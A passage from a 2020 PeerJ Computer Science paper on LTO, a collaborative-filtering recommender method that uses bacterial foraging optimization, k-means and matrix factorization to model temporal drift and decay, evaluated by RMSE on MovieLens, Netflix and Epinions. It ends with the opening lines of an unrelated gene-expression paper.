nutrient has a high level of succinate, the bacteria subsequently neglect aspartate attractant and concentrate in groups. The bacteria provide an attraction signal for the all members so that they swim together. The bacteria move in a concentric pattern with a high density. The outward movement of the ring and the native releases of attractant constitute the spatial order (Kim & Abraham, 2007). The swarming stage is represented mathematically as shown in Eq. (14). τ i(j+1,k,l)= S∑ i=1 −dattr exp(wattrβ)+ S∑ i=1 −hrepexp(wrepβ), (14) Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 10/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.331 where S denotes the number of bacteria and β is the summation of short-term features that can be learned by the members of bacteria i as shown in Eq. (15). The attractant depth dattr denotes the magnitude of excretion by a cell, attractant width wattr denotes how the chemical cohesion signal spreads, repellent height hrep and width wrep determine the size of optimization space where the cell is related to the dispersal of chemical signal. β= P∑ m=1 (τm−τ i m) 2 , (15) where P denotes the number of short-term features, τm denotes the short-term feature number m learned during the chemotaxis process whileτ im is the short-term feature number m learned during the chemotaxis process by bacteria i. In the reproduction stage, the health of bacteria is calculated according to the fitness value of each bacterium. The bacteria values are then sorted in an ascending order in the array. The fitness value provided by RMSE is extracted from the optimization area in the recommendation system (that is based on collaborative filtering). The lower half bacteria with poor foraging die and the upper half bacteria (having better foraging) are copied into two parts. Each part has the same values Al-Hadi et al. (2017a). This procedure keeps the bacterial population constant. The bacterial health can be calculated using Eq. (16). J ihealth= Nc+1∑ j=1 J(i,j,k,l), (16) where J ihealth is the healthy score of the short-term preference that can be learned by bacteria i, the number of chemotactic, reproduction and removal steps are j, k and l, respectively. Provision for the possibility of the ever-changing status of a few bacteria is carried out in the third step (removal and distribution). Here, the rise order involves the arrangement and generation of the random vector. The bacteria are organized based on their health values. Moreover, the randomly generated locations are used to change the locations of the bacteria in the optimization domain. These locations are recognized as the prominent available locations. After the generation, the best result in each repetition is approved as the final (correct) result. In this work, the BFOA is integrated with the k-means clustering algorithm and matrix factorization approach. The k-means acts as a clustering algorithm used to control the big optimization space based on members’ personal features. It is used to reduce the large number of members to a small number of clusters. These clusters are then controlled using a weight for each cluster to control the optimization domain. Applying the natural choice in the course of repeating generations, the BFOA decreases the number of poor foraging members and increases the number of rich foraging strategies (Al-Hadi, Hashim & Shamsuddin, 2011). After several generations, the poor foraging members are removed or transformed to skilled members. Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 11/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.331 EXPERIMENTAL SETTINGS The CF technique is used to predict the interest of an active user. This takes into account the calculated similarity values between the rating scores of common users (neighbours) and the active user. However, sparse rating scores in the rating matrix negatively affect the prediction accuracy of the CF technique. Thus, this research work aims to improve the prediction of sparse rating scores in the rating matrix of each active user. The data sparsity is an important issue which this research aims. The factorization approaches (including temporal-based factorization) are used to predict missing rating scores in the rating matrix which improves the prediction accuracy of CF. The percentage accuracy can be measured using RMSE function where the lower values of RMSE refers to the accurate predicted values for the missing rating score in the rating matrix and also refers to the heights accuracy prediction of the recommendation list of items that can provided to the active user. Datasets To demonstrate the performance of LTO, three real-world datasets are used: MovieLens, Netflix, and Epinions. Several experimental studies have utilized MovieLens [34], Netflix Prize [19], and Epinions [35] to predict the performances of recommendation systems. A brief description of the three datasets is given in Table 2. The customers of these datasets assign a rating score from 1 to 5 to the movie or product, where 1 to 2 indicate an unliked product and 3 to 5 indicate a liked product. In the concluding experiments, the sparsity level of each dataset is considered to show its effect on the prediction performance of these datasets. The sparsity level is computed by Eq. (17) (Abdelwahab et al., 2012), where #Rating is the score provided by users from 1 to 5 and #Total is the product of #Customers and #Products. SparsityLevel =1− #Rating #Total . (17) Normalization Data normalization is used in data transformation to reprocess the data with the aim of enhancing the precision and effectiveness of mining methods and distance calculations (Al-Hadi et al., 2016). In recommender systems, the scores of customers for products are within 0–5. However, this range may result in low prediction accuracy. Thus, the rating scores are normalized to a range (0–1) to reduce the prediction error. Table 3 shows the values of the original scores and the normalized scores. k-means and BFOA setting Table 4 shows the number of clusters for the k-means clustering method and the short-term periods for the three datasets. The MovieLens contains data for four periods (i.e., one day, one week, two weeks, and one month) while Netflix contains an additional two periods (i.e., one season and one year). For instance, the entire period of Netflix is about 2190 days which can be divided by 90 days to get 24 seasons. Here, the cluster number (i.e., 24) is assigned to represent the users’ activities throughout the temporal convergence of seasons. The k-means algorithm will divide the activities of users in the time matrix into Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 12/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.331 Table 2 Experimental datasets. MovieLens Netflix Prize Epinions Trustlet #Customers 943 480,189 4,718 #Products 1,682 17,770 36,165 #Rating 100,000 100,480,507 346,035 Sparsity level 0.93 0.98 0.99 Date 1997–1998 1999–2005 1999 #Periods 7 months 6 years 11 months Temporal vector #seconds #days #months Products Movie Movie Product Table 3 The normalization of the rating scores. Type Range Rating Scores Original [0–5] 0 1 2 3 4 5 Normalized [0–1] 0 0.2 0.4 0.6 0.8 1 Table 4 The k-means clustering method and short-term periods for different datasets. Datasets # Days Periods # Clusters ( k) Success clustering MovieLens 210 One month 7 X Two weeks 15 X One week 30 X One day 210 Epinions 330 One month 11 X Two weeks 23 X One week 47 Netflix 2190 One year 6 X One season 24 X One month 73 X Two weeks 156 24 clusters. Similarly, the interest-time for items in the time matrix will be divided into 24 clusters. However, when the number of clusters is greater than the number of customers in some rating matrices (e.g., two weeks period), Netflix will not be appropriate for grouping by the k-means algorithm. The periods of one month and one season are applied by Epinions. The one-week period is not considered as it is not suitable for Epinions temporal feature (Al-Hadi et al., 2018b). The period of two weeks by Netflix is inappropriate for k-means clustering algorithm (Al-Hadi et al., 2017a). Therefore, in the Netflix dataset, three temporal periods are used (i.e., one year, one month, and one season). The BFOA factors and their values are determined according to the proper empirical execution of the LTO approach in Table 5. In addition, a value is selected from the numbers of clusters using the P parameter as demonstrated in Table 4. Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 13/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.331 Table 5 The parameters values of BFOA. Parameters No Parameters No No. of bacteria groups S 6 Elimination-dispersal l 4 The length of a swim 4 wrep 5 Run length unit Ci 0.1 wattr 0.2 No. of iteration 20 Probability of elimination-dispersal 0.25 Optimum RMSE 0.01 dattr 0.1 No. of chemotactic steps j 6 hrep 0.1 Reproduction steps k 4 RMSE value reduction The LTO approach extracts the short-term features by deploying BFOA which uses the temporal convergence in the time matrix of a short duration. For instance, the number of months in each active user’s time matrix is considered to divide the time matrix into k-weighted clusters. The BFOA trains the clusters’ weights to reduce the overfitted predicted scores according to the smallest RMSE. The weights of a short duration are optimized based on the positive effects on the factorization factors. This way, the prediction accuracy of the CF technique is achieved. The factorization factors are extracted from a rating matrix and fixed values are provided for all iterations of the optimization process. The swarming action of bacteria provides sensor values that are integrated with RMSE to guide the members of bacteria into the direction of the rich nutrient or to avoid the detrimental area. Short-term periods are determined from the time of all preferences in each experimental dataset and their effects are shown under two kinds of scoring scales. Table 6 is an example of drift learning based on overfitting values minimization. In this example, each row contains the active user’s ID and the RMSE values for 10 iterations. The lowest RMSE value is selected by ensemble selection and saved in the last column of this table. The optimum temporal weights are also saved according to the selected RMSE value. Average RMSE values for 10 iterations (column by column) are shown in the last row. The value in the last cell is the lowest average RMSE value of the test-set members (0.875). This will be used for comparing the prediction performance of LTO with the benchmark schemes. The LTO learns the temporal weight of each user using the personality activation of the users who rated the set of items during the long-term. Similarly, the LTO learns the temporal weight of each item based on the personality activation of the set of users who rated the item during the long-term. The temporal weights of the long duration are incorporated in the baseline model to determine the interest of customers and the popularity of products. In addition, the short duration weights are learned by the LTO approach. This is achieved using minimized overfitting. LTO learns the drift and time decay features during the optimization process. This LTO approach improves the performance of the CF technique throughout the iteration loop by learning the accurate predicted sparse rating score values in the rating matrix which reducing the RMSE values. In the next section, the effect of LTO approach in learning the temporal features will be examined under the scoring of [0–5] and [0–1]. Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 14/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.331 Table 6 An Example of how LTO reduces RMSE values in Movielens under scoring [0-5]. User Iteration number Min RMSE 1 2 3 4 5 6 7 8 9 10 1 0.827 0.814 0.801 0.797 0.793 0.786 0.782 0.782 0.780 0.777 0.777 2 0.796 0.758 0.758 0.755 0.751 0.751 0.752 0.750 0.751 0.754 0.750 3 1.274 1.255 1.245 1.231 1.231 1.229 1.243 1.226 1.229 1.222 1.222 4 0.704 0.645 0.640 0.635 0.632 0.629 0.628 0.631 0.627 0.628 0.627 5 1.128 1.116 1.058 1.036 1.018 1.018 1.009 1.005 1.002 1.000 1.000 Avg. RMSE 0.946 0.918 0.900 0.891 0.885 0.882 0.883 0.879 0.878 0.876 0.875 Table 7 Average personal vectors of the Test-set matrices. Test-set MovieLens Netflix Epinions Number of the rating matrices 31 20 5 Avg. No. of customers 915 953 107 Avg. No. of products 105 128 103 Avg. No. of rating scores >0 17491 11662 517 Avg. No. of total rating scores >=0 97855 125183 10481 Avg. percentage of SparsityLevel 79.18 % 89.12 % 94.59 % EXPERIMENTAL RESULTS This section discusses the performances of the benchmark and the proposed approaches for improving the CF prediction performance technique under two scoring scales which are [0–5] and [0–1]. The efficacy of LTO in resolving the decay and drift issues by reducing the RMSE values are also discussed. Table 7 shows the personal vectors of the Test-set matrices that can impact the experimental results. There are 31 rating matrices for MovieLens which are selected by the sequence 30, 60, 90, ....., 930 for the Test-set. Each matrix in the Test-set has different numbers of rows and columns. The sparsity levels are compared with other matrices to provide unique results for each rating matrix. The average numbers of these matrices and their factors are used for performance evaluation in the experiments. LTO approach under the scoring [0–5] The LTO approach is applied to five short-term periods (which are a week, two weeks, a month, and a year) according to the tested dataset under the rating scale [0–5]. Figures 3–5 demonstrate the prediction accuracy while performing the iterations on the datasets. Figure 3 shows that the two weeks period in MovieLens has a higher prediction accuracy during 3–20 iterations compared to one week and one month. Users’ activities during the long and short duration preferences are best learned within the two weeks period. This makes it an accurate short-term preference. In Fig. 4, the period of one month in the Epinions dataset has a higher prediction accuracy during iterations 4 to 20 compared to the period of one season. Here, one month is an accurate short-term period. This period has the best short and long-term performances compared to one season. One year period in Netflix provides a greater Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 15/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.331 Figure 3 LTO prediction accuracy improvement of CF for MovieLens. Full-size DOI: 10.7717/peerjcs.331/fig-3 prediction performance from iterations 1 to 5 in Fig. 5. Across iterations 5 to 20, the period of one year is more precise than one month but less than the period of one season. The temporal attitudes are learned by the LTO approach over 20 iterations. This helps to achieve precise predictions by optimizing the temporal weights of each duration. The periods of Netflix are 6 years, 42 seasons or 73 months. Experimental results show that LTO, in one season, achieved the highest prediction performance compared to its predicted performance using the year and month periods. This is because the duration of a season is an intermediate between a month and a year. Moreover, various customers’ activities are performed therein. LTO approach under the scoring [0–1] This subsection demonstrates the normalizing effect on the performance of LTO for reducing the RMSE under the scoring [0-1]. Figures 6, 7 and 8 track the effects of the temporal vectors in improving the prediction accuracy of the CF using the LTO approach. Figure 6 indicates that the RMSE of MovieLens for a week is better than that of a month under the rating scale [0–1]. Additionally, the RMSE during the period of two weeks is the best compared to those of a week and a month. This emphasizes the significance of the two-week period in learning the drift of customers’ interests and products’ popularity time decay. Figure 7 shows the prediction accuracy using Epinions, Here, the period of one month has a significant effect on reducing the RMSE in iterations 3 to 20 compared to the effect of one season. In Figure 8, the effect of a season using Netflix is equivalent to the effect of a year but more than the effect of a month during iterations 1 to 13. Iterations 13 to 20 has the Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 16/25 https://peerj.com https://doi.org/10.7717/peerjcs.331/fig-3 http://dx.doi.org/10.7717/peerj-cs.331 Figure 4 LTO prediction accuracy improvement of CF for Epinions. Full-size DOI: 10.7717/peerjcs.331/fig-4 Figure 5 LTO prediction accuracy improvement of CF for Netflix. Full-size DOI: 10.7717/peerjcs.331/fig-5 sharpest accuracy prediction in the season compared to the period of one year and one month. Figures 3–8 show the potential of BFOA in learning the temporal features by swarming in the dimensional time-space. The effects of the equivalent time periods show that the customers’ interests and the products’ popularity changed during these periods. The proposed approach will be evaluated by the current factorization and temporal approaches in the next subsection. Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 17/25 https://peerj.com https://doi.org/10.7717/peerjcs.331/fig-4 https://doi.org/10.7717/peerjcs.331/fig-5 http://dx.doi.org/10.7717/peerj-cs.331 Figure 6 LTO prediction accuracy improvement of CF for MovieLens. Full-size DOI: 10.7717/peerjcs.331/fig-6 Figure 7 LTO improves accuracy prediction of CF for Epinions. Full-size DOI: 10.7717/peerjcs.331/fig-7 Comparison of the performances of CF, MF, and Temporal-based approaches In this subsection, the LTO approach is evaluated by comparing its effectiveness in reducing RMSE values with other benchmark approaches. Both LTO and the benchmarks are used to predict the sparse scores as they all lower the RMSE values. Note that the lower the RMSE value, the higher the prediction accuracy of the CF approach. In Table 8, seven approaches are implemented to benchmark the prediction performance of LTO. The improvement in the prediction performance of the CF technique is represented by two scoring scales: [0–5] Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 18/25 https://peerj.com https://doi.org/10.7717/peerjcs.331/fig-6 https://doi.org/10.7717/peerjcs.331/fig-7 http://dx.doi.org/10.7717/peerj-cs.331 Figure 8 LTO prediction accuracy improvement of CF for Epinions. Full-size DOI: 10.7717/peerjcs.331/fig-8 and [0–1]. First, the scores from 0 to 5 are provided by the users of the three experimental datasets, and the benchmarks are categorized into three parts. The first part contains the prediction accuracy of the CF technique by RMSE for the rating matrix of the active user without predicting the sparse rating scores. The second part contains the prediction accuracy of the CF by two factorization approaches which are Neighbour-based Baseline (Bell & Koren, 2007) and the Ensemble Divide and Conquer (Al-Hadi et al., 2016). These approaches are used to solve the sparsity issue and as well learn the accurate factorization features. From the evaluations, it is observed that the prediction performance of Ensemble Divide and Conquer is better than that of the CF and the Neighbours-based Baseline approach. However, the approaches in the second category have weaknesses in learning the overfitted predicted scores and temporal issues (such as drift and decay). For the third category, five temporal approaches are used to solve five issues i.e., sparsity, accurately learning latent features, overfitting, drift, and decay. The Temporal Dynamics (Koren, 2009) has a good prediction performance in solving these issues but it has a weakness in learning the personalized features using the equaled time slices. Temporal Integration using Netflix performs better compared to Temporal Dynamics and Short-Term based Latent approach. However, Temporal Integration has a weakness with respect to drift and decay. Short Temporal-based Factorization (Al-Hadi et al., 2017a) addresses all issues except popularity decay. It improves the prediction performance of the CF technique when compared to the above approaches using MovieLens and Netflix. The performance of the Short Temporal-based Factorization approach is lower than that of the Ensemble Divide and conquer approach using the Epinions dataset because the recorded timestamp factors are registered using the number of months only (which represent weak temporal Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 19/25 https://peerj.com https://doi.org/10.7717/peerjcs.331/fig-8 http://dx.doi.org/10.7717/peerj-cs.331 Table 8 The RMSE of several prediction approaches using three datasets. Approach Scoring [0–5] Scoring [0–1] MovieLens Epinions Netflix MovieLens Epinions Netflix CF 0.9573 1.0536 0.9983 0.1915 0.2107 0.1997 Neighbors based Baseline (Bell & Koren, 2007) 0.9613 1.0562 0.9982 0.1923 0.2112 0.1996 Ensemble Divide and Conquer (Al-Hadi et al., 2016) 0.9481 1.0351 0.973 0.1896 0.2069 0.1948 Temporal Dynamics (Koren, 2009) 0.9514 1.0486 1.0173 0.1903 0.2097 0.2035 Short-Term based Latent (Yang et al., 2012) 0.9613 1.0562 0.9982 0.1923 0.2110 0.1996 Temporal Integration (Ye & Eskenazi, 2014) 0.9557 1.0563 0.9982 0.1912 0.2112 0.1996 Short Termporal based Factorization (Al-Hadi et al., 2017a) 0.8716 1.0492 0.9704 0.1771 0.2088 0.1900 LTO 0.7933 0.9887 0.8136 0.1642 0.199 0.1564 features). Distinctively, the LTO approach addresses all issues including the limitations in the benchmark schemes. It improves the prediction performance of the CF technique through a perfect combination of various factorization and temporal features. It also tracks the drift of users and the decay of items throughout the learning process. Table 8 shows that LTO exhibits superior prediction performance when compared to all benchmarks. The normalization process for rating scores has reduced the RMSE values by almost 80 % due to the percentage difference between the rating scores [0–5] and [0–1]. For example, the percentage difference of LTO approach in MovieLens is calculated using Eq. (18). Percentage Difference=1− Scoring scale1−Scoring scale2 Scoring scale1 , (18) where Scoring scale1 is from 1 to 5 and Scoring scale2 is from 0 to 1. The percentage difference between 0.7933 and 0.1642 is 79.3%. Figure 9 indicates the high prediction accuracy achieved by the LTO approach for the three datasets when compared with the benchmark methods. Additionally, the graphs show the positive impact of the normalization in reducing the RMSE by around 80%. Comparison of the output prediction scores of CF and LTO The CF technique utilizes the similarity function to calculate the similarity between the active user and the common users or neighbors. In the second stage, CF utilizes the prediction function according to the similarity values to recommend items to the active user. However, CF’s predicted scores are not accurate because of the sparsity values in the rating matrix. This is solved using the LTO approach. Table 9 is an example showing the improved accuracy of the predicted scores achieved by the LTO approach. In this example, the short duration is one year. Active users rate items from 1 to 5, where 1 and 2 indicate unlike items while 3, 4, and 5 indicate the liked items. The CF predicts rating scores from 2.4 to 3.3. This provides the active users with recommended and unrecommended items (denoted by R and N, respectively in Table 9). On the other hand, the LTO approach predicts rating scores from 0.4 to 5.0 which provides more accurate prediction compared to the CF. Figure 10 visualizes the output in Table 9 and indicates the high prediction performance of the LTO approach. Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 20/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.331 Figure 9 The normalisation effects on the prediction accuracy of CF. LTO provides the highest accuracy prediction for the CF under scoring [0–1]. Full-size DOI: 10.7717/peerjcs.331/fig-9 Table 9 Feedback prediction scores by CF and LTO approaches. items i1 i2 i3 i4 i5 i6 i7 i8 i9 i10 i11 i12 i13 i14 Active user 1 4 1 3 1 2 2 1 5 2 5 2 5 2 CF 2.9 2.9 2.9 3.1 3.3 2.7 2.8 2.5 2.9 2.4 2.9 2.4 2.9 2.9 R R R R R R R R R N R N R R LTO 0.4 4.3 2.4 2.3 2.2 2.5 1.8 2.4 3.9 2.3 5 3 3.7 3.3 N R N N N R N N R N R R R R Figure 10 Feedback prediction scores by CF and LTO approaches. Full-size DOI: 10.7717/peerjcs.331/fig-10 Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 21/25 https://peerj.com https://doi.org/10.7717/peerjcs.331/fig-9 https://doi.org/10.7717/peerjcs.331/fig-10 http://dx.doi.org/10.7717/peerj-cs.331 CONCLUSION The CF performance is affected by several factors including changes in the customer’s taste, time decay in the popularity of products, data sparsity, and the overfitting in the predicted rating scores. Prior research has attempted to enhance the CF’s prediction function by integrating the long and short-term preferences via the temporal interaction method (Ye & Eskenazi, 2014) with the factorization factors. However, the achievement is low. The goal of the long temporal-based factorization approach (Al-Hadi et al., 2018b) is to solve the popularity decay problem and understand the drifting taste of clients over the long-term. On the other hand, the main focus of the short temporal-based factorization approach is to understand the behaviors of customers and solve the drift issue in the short-term. Nonetheless, there are several limitations associated with predicting popularity decay issues as well as the drift in customers’ preferences over time. To address these problems, the LTO approach presented in this paper integrates both short and long-term preferences. It utilizes the k-means and BFOA method which derived the fitness value by combining the signal and RMSE values. The swarming function represents the preferences of the short-term based on the sensitivity of bacteria to rich nutrients or dangerous signals. According to the empirical findings, a higher prediction precision is achieved by the LTO approach compared to the benchmark approaches. This is attributed to the temporal-based factorization approach and its ability to enhance the accuracy of the CF technique by understanding the temporal behaviors in both long and short preferences. Possible extensions of this work include integrating the LTO approach with other factorization features such as neighbors’ latent feedbacks. This would contribute to addressing issues such as the cold start when recommending new items to active users. Besides, the genre’s features of movies can be integrated with the factors that are utilized by LTO approach for the purpose of addressing challenges of new items by the MovieLens and Yahoo! Music datasets. ADDITIONAL INFORMATION AND DECLARATION Funding This publication is funded by the Asian Office of Airforce Research and Development (AOARD) through a project on Deep Recurrent Q Learning for Recommendation System. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: The Asian Office of Airforce Research and Development (AOARD) through a project on Deep Recurrent Q Learning for Recommendation System. Competing Interests The authors declare there are no competing interests. Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 22/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.331 Author Contributions • Ismail Ahmed Al-Qasem Al-Hadi conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, developed the solutions proposed, and approved the final draft. • Nurfadhlina Mohd Sharef conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, supervised and lead the project, and approved the final draft. • Md Nasir Sulaiman and Norwati Mustapha conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • Mehrbakhsh Nilashi analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Codes are available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.331#supplemental-information. REFERENCES Abdelwahab A, Sekiya H, Matsuba I, Horiuchi Y, Kuroiwa S. 2012. Feature optimiza- tion approach for improving the collaborative filtering performance using particle swarm optimization. Journal of Computational Information Systems 8(1):435–450. Al-Badarneh Amer , Ali Mostafa SMG. 2016. An improved classifier for arabic text. Journal of Convergence Information Technology 11:69–84. Al-Hadi IAA-Q, Hashim SZM, Shamsuddin SMH. 2011. Bacterial Foraging Optimiza- tion Algorithm for neural network learning enhancement. In: 2011 11th international conference on hybrid intelligent systems (HIS). Piscataway: IEEE, 200–205. Al-Hadi IAA-Q, Sharef NM, Nasir SM, Norwati M. 2018a. Temporal based factorization approach for solving drift and decay in sparse scoring matrix. In: International conference on soft computing and data mining. Cham: Springer, 340–350. Al-Hadi IAA-Q, Sharef NM, Sulaiman MN, Mustapha N. 2016. Ensemble divide and conquer approach to solve the rating scores’ deviation in recommendation system. Journal of Computational Science 12(6):265–275 DOI 10.3844/jcssp.2016.265.275. Al-Hadi IAA-Q, Sharef NM, Sulaiman MN, Mustapha N. 2017a. Bacterial foraging opti- mization algorithm with temporal features to solve data sparsity in recommendation system. In: Proceedings of the second international conference on internet of things, data and cloud computing. 1–6. Al-Hadi IAA-Q, Sharef NM, Sulaiman MN, Mustapha N. 2017b. Review of the temporal recommendation system with matrix factorization. International Journal of Innova- tive Computing, Information and Control 13(5):1579–1594. Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 23/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.331#supplemental-information http://dx.doi.org/10.7717/peerj-cs.331#supplemental-information http://dx.doi.org/10.7717/peerj-cs.331#supplemental-information http://dx.doi.org/10.3844/jcssp.2016.265.275 http://dx.doi.org/10.7717/peerj-cs.331 Al-Hadi IAA-Q, Sharef NM, Sulaiman MN, Mustapha N. 2018b. Temporal-based approach to solve item decay problem in recommendation system. Advanced Science Letters 24(2):1421–1426 DOI 10.1166/asl.2018.10762. Alhijawi B, Kilani Y. 2020. A collaborative filtering recommender system us- ing genetic algorithm. Information Processing & Management 57(6):102310 DOI 10.1016/j.ipm.2020.102310. Bell RM, Koren Y. 2007. Lessons from the Netflix prize challenge. Association for Com- puting Machinery SIGKDD Explorations Newsletter 9(2):75–79 DOI 10.1145/1345448.1345465. Chu PM, Mao Y-S, Lee S-J, Hou C-L. 2020. Leveraging user comments for recommenda- tion in E-commerce. Applied Sciences 10(7):1–18 DOI 10.3390/app10072540. Han H, Huang M, Zhang Y, Bhatti UA. 2018. An extended-tag-induced matrix factorization technique for recommender systems. Information 9(6):143 DOI 10.3390/info9060143. Idrissi N, Zellou A. 2020. A systematic literature review of sparsity issues in recom- mender systems. Social Network Analysis and Mining 10(1):15 DOI 10.1007/s13278-020-0626-2. Jonnalagedda N, Gauch S, Labille K, Alfarhood S. 2016. Incorporating popularity in a personalized news recommender system. PeerJ Computer Science 2:e63 DOI 10.7717/peerj-cs.63. Kim D-H, Abraham A. 2007. A hybrid genetic algorithm and bacterial foraging ap- proach for global optimization and robust tuning of PID controller with disturbance rejection. In: Hybrid evolutionary algorithms. Berlin, Heidelberg: Springer, 171–199. Koenigstein N, Dror G, Koren Y. 2011. Yahoo! music recommendations: modeling music ratings with temporal dynamics and item taxonomy. In: Proceedings of the fifth ACM conference on Recommender systems. New York: ACM, 165–172. Koren Y. 2008. Factorization meets the neighborhood: a multifaceted collaborative filtering model. In: Proceedings of the 14th ACM SIGKDD international conference on Knowledge discovery and data mining. New York: ACM, 426–434. Koren Y. 2009. Collaborative filtering with temporal dynamics. In: Proceedings of the 15th ACM SIGKDD international conference on Knowledge discovery and data mining. New York: ACM, 447–456. Li F, Xu G, Cao L. 2016. Two-level matrix factorization for recommender systems. Neural Computing and Applications 27(8):2267–2278 DOI 10.1007/s00521-015-2060-3. Li G, Chi M. 2018. Expert CF: solving data matrix sparsity and computation complexity problems. Transactions on Machine Learning and Artificial Intelligence 6(2):36–36. Lin J, Li Y, Lian J. 2020. A novel recommendation system via L0-regularized convex optimization. Neural Computing and Applications 32(6):1649–1663 DOI 10.1007/s00521-019-04213-w. Mirbakhsh N, Ling CX. 2013. Clustering-based factorized collaborative filtering. In: Proceedings of the 7th ACM conference on Recommender systems. New York: ACM, 315–318. Nguyen L, Do M-PT. 2018. A novel collaborative filtering algorithm by bit mining frequent itemsets. PeerJ Preprints 6:e26444v1. Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 24/25 https://peerj.com http://dx.doi.org/10.1166/asl.2018.10762 http://dx.doi.org/10.1016/j.ipm.2020.102310 http://dx.doi.org/10.1145/1345448.1345465 http://dx.doi.org/10.3390/app10072540 http://dx.doi.org/10.3390/info9060143 http://dx.doi.org/10.1007/s13278-020-0626-2 http://dx.doi.org/10.7717/peerj-cs.63 http://dx.doi.org/10.1007/s00521-015-2060-3 http://dx.doi.org/10.1007/s00521-019-04213-w http://dx.doi.org/10.7717/peerj-cs.331 Nilashi M, Ahani A, Esfahani MD, Yadegaridehkordi E, Samad S, Ibrahim O, Sharef NM, Akbari E. 2019. Preference learning for eco-friendly hotels recommendation: a multi-criteria collaborative filtering approach. Journal of Cleaner Production 215:767–783 DOI 10.1016/j.jclepro.2019.01.012. Nilashi M, Bin Ibrahim O, Ithnin N. 2014. Hybrid recommendation approaches for multi-criteria collaborative filtering. Expert Systems with Applications 41(8):3879–3900 DOI 10.1016/j.eswa.2013.12.023. Nilashi M, Jannach D, bin Ibrahim O, Ithnin N. 2015. Clustering-and regression-based multi-criteria collaborative filtering with incremental updates. Information Sciences 293:235–250 DOI 10.1016/j.ins.2014.09.012. Rabiu I, Salim N, Da’u A, Osman A. 2020. Recommender system based on temporal models: a systematic review. Applied Sciences 10(7):2204 DOI 10.3390/app10072204. Sardianos C, Ballas Papadatos G, Varlamis I. 2019. Optimizing parallel collaborative fil- tering approaches for improving recommendation systems performance. Information 10(5):155 DOI 10.3390/info10050155. Vo ND, Hong M, Jung JJ. 2020. Implicit stochastic gradient descent method for cross- domain recommendation system. Sensors 20(9):2510 DOI 10.3390/s20092510. Wang J, Han P, Miao Y, Zhang F. 2019. A collaborative filtering algorithm based on svd and trust factor. In: 2019 international conference on computer, network, communication and information systems (CNCI 2019). Atlantis Press,. Wu X, Yuan X, Duan C, Wu J. 2019. A novel collaborative filtering algorithm of machine learning by integrating restricted Boltzmann machine and trust information. Neural Computing and Applications 31(9):4685–4692 DOI 10.1007/s00521-018-3509-y. Yang D, Chen T, Zhang W, Yu Y. 2012. Collaborative filtering with short term pref- erences mining. In: Proceedings of the 35th international ACM SIGIR conference on Research and development in information retrieval. New York: ACM, 1043–1044. Ye F, Eskenazi J. 2014. Feature-based matrix factorization via long-and short-term interaction. In: Knowledge engineering and management. Springer, Berlin: Springer, 473–484. Yuan Y, Zahir A, Yang J. 2019. Modeling implicit trust in matrix factorization-based collaborative filtering. Applied Sciences 9(20):4378 DOI 10.3390/app9204378. Zainal N, Al-Hadi IAA-Q, Ghaleb SM, Hussain H, Ismail W, Aldailamy AY. 2020. Predicting MIRA patients’ performance using virtual rehabilitation programme by decision tree modelling. In: Recent advances in intelligent systems and smart applications. Cham: Springer, 451–462. Zhang F, Qi S, Liu Q, Mao M, Zeng A. 2020a. Alleviating the data sparsity problem of recommender systems by clustering nodes in bipartite networks. Expert Systems with Applications 149(2020):1–10. Zhang L, Wei Q, Zhang L, Wang B, Ho W-H. 2020b. Diversity balancing for two- stage collaborative filtering in recommender systems. Applied Sciences 10(4):1257 DOI 10.3390/app10041257. Al-Hadi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.331 25/25 https://peerj.com http://dx.doi.org/10.1016/j.jclepro.2019.01.012 http://dx.doi.org/10.1016/j.eswa.2013.12.023 http://dx.doi.org/10.1016/j.ins.2014.09.012 http://dx.doi.org/10.3390/app10072204 http://dx.doi.org/10.3390/info10050155 http://dx.doi.org/10.3390/s20092510 http://dx.doi.org/10.1007/s00521-018-3509-y http://dx.doi.org/10.3390/app9204378 http://dx.doi.org/10.3390/app10041257 http://dx.doi.org/10.7717/peerj-cs.331 work_h4aasljqkvdjhgcpyi6kvxbpsy ---- CogNet: classification of gene expression data based on ranked active-subnetwork-oriented KEGG pathway enrichment analysis CogNet: classification of gene expression data based on ranked active-subnetwork- oriented KEGG pathway enrichment analysis Malik Yousef1,2, Ege Ülgen3 and Osman Uğur Sezerman3 1 Galilee Digital Health Research Center (GDH), Zefat 